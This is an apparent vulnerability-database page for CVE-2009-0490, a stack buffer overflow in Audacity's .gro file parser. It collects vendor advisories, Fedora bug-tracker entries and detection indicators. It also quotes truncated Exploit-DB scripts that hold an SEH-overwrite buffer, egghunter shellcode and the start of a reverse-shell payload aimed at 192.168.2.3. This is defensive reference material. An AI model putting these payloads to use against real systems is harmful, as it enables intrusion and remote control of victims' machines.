CVE-2009-0490
published 2009-02-10CVE-2009-0490: Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse.cpp in Audacity 1.2.6 and other versions before 1.3.6…
PriorityP351critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
16.63%
96.6th percentile
Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse.cpp in Audacity 1.2.6 and other versions before 1.3.6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a .gro file containing a long string.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| audacityteam | audacity | < 1.3.6 | 1.3.6 |
| audacityteam | audacity | >= 0 < 1.3.6-1 | 1.3.6-1 |
| audacityteam | audacity | >= 0 < 1.3.6-1 | 1.3.6-1 |
| audacityteam | audacity | >= 0 < 1.3.6-1 | 1.3.6-1 |
| audacityteam | audacity | >= 0 < 1.3.6-1 | 1.3.6-1 |
| debian | audacity | < audacity 1.3.6-1 (bookworm) | audacity 1.3.6-1 (bookworm) |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
W00TW00T
bytes↗
\x44 * 174 + \xEB\x08\x90\x90 + \x22\x23\x17\x01
bytes↗
\x69\x72\x61\x71\x69\x72\x61\x71 (egg marker iraq x2)
bytes↗
\x57\x30\x30\x54 (egg W00T)
- →Exploit uses an egghunter shellcode with the egg tag 'W00TW00T' (bytes \x57\x30\x30\x54 repeated twice); scan process memory or file content for this egg marker to identify exploit payloads. ↗
- →A second exploit variant uses the egg tag 'iraqiraq' (\x69\x72\x61\x71 repeated twice) prepended to shellcode; scan .gro files or memory for this pattern. ↗
- →The SE handler is overwritten; monitor for SEH-chain corruption (pointer to next SEH record and SE Handler overwritten) when Audacity processes .gro files. ↗
- →The exploit targets msacm32.drv on Windows XP SP3 as the return address (\xbe\x2e\xd1\x72); presence of this address in a .gro file buffer is a strong indicator of exploitation. ↗
- ·The exploit in EDB-9501 hardcodes a reverse-shell callback to 192.168.2.3; this is a placeholder and must be changed by the attacker, so the IP alone is not a reliable network IOC. ↗
- ·Vulnerability is fixed in Audacity 1.3.6 and later; all Debian stable branches resolved with version 1.3.6-1. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
osv9.3CRITICAL
vendor_debian9.3CRITICAL
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
audacity: stack-based buffer overflow
vendor_redhat·2009-01-02·CVSS 9.3
CVE-2009-0490 [CRITICAL] CWE-121 audacity: stack-based buffer overflow
audacity: stack-based buffer overflow
Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse.cpp in Audacity 1.2.6 and other versions before 1.3.6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a .gro file containing a long string.
Debian
CVE-2009-0490: audacity - Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in...
vendor_debian·2009·CVSS 9.3
CVE-2009-0490 [CRITICAL] CVE-2009-0490: audacity - Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in...
Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse.cpp in Audacity 1.2.6 and other versions before 1.3.6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a .gro file containing a long string.
Scope: local
bookworm: resolved (fixed in 1.3.6-1)
bullseye: resolved (fixed in 1.3.6-1)
forky: resolved (fixed in 1.3.6-1)
sid: resolved (fixed in 1.3.6-1)
trixie: resolved (fixed in 1.3.6-1)
GHSA
GHSA-8f8x-6454-8222: Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse
ghsa_unreviewed·2022-05-02
CVE-2009-0490 [HIGH] CWE-787 GHSA-8f8x-6454-8222: Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse
Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse.cpp in Audacity 1.2.6 and other versions before 1.3.6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a .gro file containing a long string.
OSV
CVE-2009-0490: Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse
osv·2009-02-10·CVSS 9.3
CVE-2009-0490 [CRITICAL] CVE-2009-0490: Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse
Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse.cpp in Audacity 1.2.6 and other versions before 1.3.6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a .gro file containing a long string.
No detection rules found.
Exploit-DB
Audacity 1.2.6 - '.gro' Local Buffer Overflow
exploitdb·2009-12-05
CVE-2009-0490 Audacity 1.2.6 - '.gro' Local Buffer Overflow
Audacity 1.2.6 - '.gro' Local Buffer Overflow
---
#exploit.py
# Audacity 1.2.6 (gro File) Buffer overflow Exploit
# By: Encrypt3d.M!nd
# http://m1nd3d.wordpress.com/
#####################################################
# i know this exploit already been posted, but the author
# used an address as an universal,well,it's universal but
# it can't be called to jump.because it cause privileged_
# exception,so you can just use it.
#
# Tested on: Windows xp sp3
#
chars = "\x44" * 174
ns= "\xeb\x08\x90\x90"
sh= "\xbe\x2e\xd1\x72" # Windows xp sp3 - msacm32.drv
nops= "\x90"* 20
eggh= "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x69\x72\x61\x71\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
shellcode= "\x69\x72\x61\x71\x69\x72\x61\x71"
shellcode+= (
"\x89\xe6\xd9\xc7\x
Exploit-DB
Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
exploitdb·2009-08-24
CVE-2009-0490 Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
---
#!/usr/bin/env python
#
# Audacity
print " [+] Creating eviL .gro file..."
buff = ("\x44" * 174)
buff += ("\xEB\x08\x90\x90")
buff += ("\x22\x23\x17\x01")
buff += "\x90"* 4
buff += ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x57\x30\x30\x54" # this is the egg...
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
buff += ("\xCC" * 1000);
buff += "W00TW00T"
# Reverse shellcode to 192.168.2.3 change as you see fit (2000 bytes for space)
buff += ("\x89\xe5\xd9\xc3\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4
Exploit-DB
Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)
exploitdb·2009-01-01
CVE-2009-0490 Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)
Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)
---
# -----------------------------------------------------------
# Author : Houssamix
# -----------------------------------------------------------
# Audacity 1.2.6 (.gro file ) Local buffer overflow POC
# download : http://audacity.sourceforge.net/
# Audacity® is free, open source software for recording and editing sounds.
# Description:
# When we select : project > import midi.. and we import ".gro" file contains long Chars
# The Program Will crash and The Following Happen:
# EAX:05050504 ECX:01414141 EDX:01520608 EBX:0012F154
# ESP:0012EF10 EBP:00000000 ESI:41414141 EDI:00000000
# EIP:006AEC54 audacity.006AEC54
# Access violation When Reading [41414141]
# And Also The Pointer to next SEH record and SE Handler Will gonna BE Ove
Bugzilla
CVE-2009-0490 audacity: stack-based buffer overflow [Fdevel]
bugzilla·2009-02-10·CVSS 9.3
CVE-2009-0490 [CRITICAL] CVE-2009-0490 audacity: stack-based buffer overflow [Fdevel]
CVE-2009-0490 audacity: stack-based buffer overflow [Fdevel]
Fdevel tracking bug: see blocks bug list for full details of the security issue(s).
This bug is never intended to be made public, please put any public notes in the 'blocks' bugs.
NOTE THIS ISSUE IS CURRENTLY EMBARGOED, DO NOT MAKE PUBLIC COMMITS OR COMMENTS ABOUT THIS ISSUE.
[bug automatically created by: add-tracking-bugs]
Discussion:
Sorry, this isn't actually embargoed so please disregard all the yelling in the previous comments.
---
This bug appears to have been reported against 'rawhide' during the Fedora 11 development cycle.
Changing version to '11'.
More information and reason for this action is here:
http://fedoraproject.org/wiki/BugZappers/HouseKeeping
---
Why am I (and the other co-owner) missing in the Cc
Bugzilla
CVE-2009-0490 audacity: stack-based buffer overflow
bugzilla·2009-02-10·CVSS 9.3
CVE-2009-0490 [CRITICAL] CVE-2009-0490 audacity: stack-based buffer overflow
CVE-2009-0490 audacity: stack-based buffer overflow
Name: CVE-2009-0490
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0490
Assigned: 20090209
Reference: MILW0RM:7634
Reference: URL: http://www.milw0rm.com/exploits/7634
Reference: MLIST:[audacity-devel] 20090110 Audacity "String_parse::get_nonspace_quoted()" Buffer Overflow
Reference: URL: http://n2.nabble.com/Audacity-%22String_parse::get_nonspace_quoted()%22-Buffer-Overflow-td2139537.html
Reference: CONFIRM: http://bugs.gentoo.org/show_bug.cgi?id=253493
Reference: BID:33090
Reference: URL: http://www.securityfocus.com/bid/33090
Reference: FRSIRT:ADV-2009-0008
Reference: URL: http://www.frsirt.com/english/advisories/2009/0008
Reference: OSVDB:51070
Reference: URL: http://osvdb.org/51070
Reference: SECUNIA:33356
Reference: UR
Bugzilla
CVE-2009-0490 audacity: stack-based buffer overflow [F9]
bugzilla·2009-02-10·CVSS 9.3
CVE-2009-0490 [CRITICAL] CVE-2009-0490 audacity: stack-based buffer overflow [F9]
CVE-2009-0490 audacity: stack-based buffer overflow [F9]
F9 tracking bug: see blocks bug list for full details of the security issue(s).
This bug is never intended to be made public, please put any public notes in the 'blocks' bugs.
NOTE THIS ISSUE IS CURRENTLY EMBARGOED, DO NOT MAKE PUBLIC COMMITS OR COMMENTS ABOUT THIS ISSUE.
[bug automatically created by: add-tracking-bugs]
Discussion:
You can eventually use the following link to create the update request:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&release=Fedora%209&bugs=484953,
---
Sorry, this isn't actually embargoed so please disregard all the yelling in the previous comments.
---
Correct update submission URL is:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&bu
Bugzilla
CVE-2009-0490 audacity: stack-based buffer overflow [F10]
bugzilla·2009-02-10·CVSS 9.3
CVE-2009-0490 [CRITICAL] CVE-2009-0490 audacity: stack-based buffer overflow [F10]
CVE-2009-0490 audacity: stack-based buffer overflow [F10]
F10 tracking bug: see blocks bug list for full details of the security issue(s).
This bug is never intended to be made public, please put any public notes in the 'blocks' bugs.
NOTE THIS ISSUE IS CURRENTLY EMBARGOED, DO NOT MAKE PUBLIC COMMITS OR COMMENTS ABOUT THIS ISSUE.
[bug automatically created by: add-tracking-bugs]
Discussion:
You can eventually use the following link to create the update request:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&release=Fedora%2010&bugs=484952,
---
Sorry, this isn't actually embargoed so please disregard all the yelling in the previous comments.
---
Correct update submission URL is:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security
http://bugs.gentoo.org/show_bug.cgi?id=253493http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.htmlhttp://n2.nabble.com/Audacity-%22String_parse::get_nonspace_quoted%28%29%22-Buffer-Overflow-td2139537.htmlhttp://osvdb.org/51070http://secunia.com/advisories/33356http://www.securityfocus.com/bid/33090http://www.vupen.com/english/advisories/2009/0008https://www.exploit-db.com/exploits/7634http://bugs.gentoo.org/show_bug.cgi?id=253493http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.htmlhttp://n2.nabble.com/Audacity-%22String_parse::get_nonspace_quoted%28%29%22-Buffer-Overflow-td2139537.htmlhttp://osvdb.org/51070http://secunia.com/advisories/33356http://www.securityfocus.com/bid/33090http://www.vupen.com/english/advisories/2009/0008https://www.exploit-db.com/exploits/7634
2009-02-10
Published